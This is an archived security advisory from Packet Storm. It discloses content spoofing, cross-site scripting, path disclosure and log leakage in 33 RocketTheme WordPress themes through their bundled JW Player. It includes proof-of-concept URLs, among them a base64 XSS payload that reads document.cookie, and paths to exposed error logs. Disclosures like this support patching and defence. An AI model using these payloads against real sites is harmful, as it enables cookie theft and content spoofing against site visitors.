what you don't know can hurt you

WordPress RocketTheme Content Spoofing / Cross Site Scripting

WordPress RocketTheme Content Spoofing / Cross Site Scripting
Posted Dec 30, 2012
Authored by MustLive

33 new themes for WordPress that are made by RocketTheme suffer from cross site scripting, path disclosure, and content spoofing vulnerabilities.

tags | exploit, spoof, vulnerability, xss
MD5 | df6a69f11eea2909deb52c051c23a786

WordPress RocketTheme Content Spoofing / Cross Site Scripting

Change Mirror Download
Hello list!

Earlier I've wrote to the list about multiple vulnerabilities in multiple
themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In
that later I've mentioned 16 themes by RocketTheme (with Rokbox):
Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse,
Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx,
Moxy, Terrantribune, Meridian.

I've wrote about 14 themes + 2 variations of 2 themes by these developers,
but they have 47 themes for WordPress in total. Among them only three are
free, and all other themes from RocketTheme are paid ones (it's needed to
buy subscription to the club to receive access to them). And Rokbox is
bundled with all these themes, except Grunge, which have all
earlier-mentioned vulnerabilities.

So I inform you about multiple vulnerabilities in 33 new themes for
WordPress, which are developed by RocketTheme (Rokbox's developers). These
are Content Spoofing, Cross-Site Scripting, Full path disclosure and
Information Leakage vulnerabilities.

-------------------------
Affected products:
-------------------------

In these 32 themes (in addition to previous 16) there are Cross-Site
Scripting, Content Spoofing, Full path disclosure and Information Leakage
vulnerabilities. And Grunge theme has FPD holes.

These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere,
Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex,
Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox,
Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline,
Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge.

Affected all versions of these themes for WordPress.

Since August I've informed the developers many times concerning
vulnerabilities in Rokbox and their themes with it.

----------
Details:
----------

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

1.xml

<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

In all these themes there is FPD in index.php
(http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for other
themes), which works at default PHP settings. Also potentially there are FPD
in other php-files of these themes.

Information Leakage (WASC-13):

In some themes, similar to rt_mixxmag_wp, there can be error log with full
paths.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close